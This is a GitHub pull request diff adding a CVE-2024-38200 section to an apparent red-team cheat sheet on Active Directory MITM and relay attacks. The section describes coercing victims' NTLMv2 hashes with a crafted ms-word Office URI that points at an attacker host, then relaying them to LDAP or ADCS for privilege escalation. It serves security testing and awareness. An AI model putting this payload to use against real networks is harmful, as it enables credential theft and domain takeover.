Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update internal-mitm-relay.md #21

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 7 additions & 1 deletion docs/active-directory/internal-mitm-relay.md
Original file line number Diff line number Diff line change
Expand Up @@ -344,6 +344,12 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c

* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener

## CVE-2024-38200
CVE-2024-38200 enables the capture of victim users' NTLMv2 hashes over SMB and HTTP by leveraging the Office URI Schema.<br>
If we add a DNS A record and use this record name within the Office URI Schema (e.g., ms-word:ofe|u|http://attacker/leak.docx), Windows will consider the hostname as part of the Intranet Zone by default. In this way, NTLMv2 authentication occurs automatically when an Office application fetches a document from a remote source via crafted `ms-word:ofe|u|http://attacker/leak.docx` Office URI. The only requirement is for the victim user to visit the URL of an HTML file that redirects to the `ms-word:ofe|u|http://attacker/leak.docx`. A standard user can escalate privileges with LDAP relaying when this attack is performed against privileged user (e.g., enterprise admin, domain admin). <br>
Capturing the NTLMv2 hash over HTTP method was not fixed (a warning box still does not apper). The NTLMv2 hash value can still be obtained over HTTP and relayed to LDAP or ADCS.

https://github.com/passtheticket/CVE-2024-38200

## References

Expand All @@ -353,4 +359,4 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c
* [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/)
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers - 07/27/2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)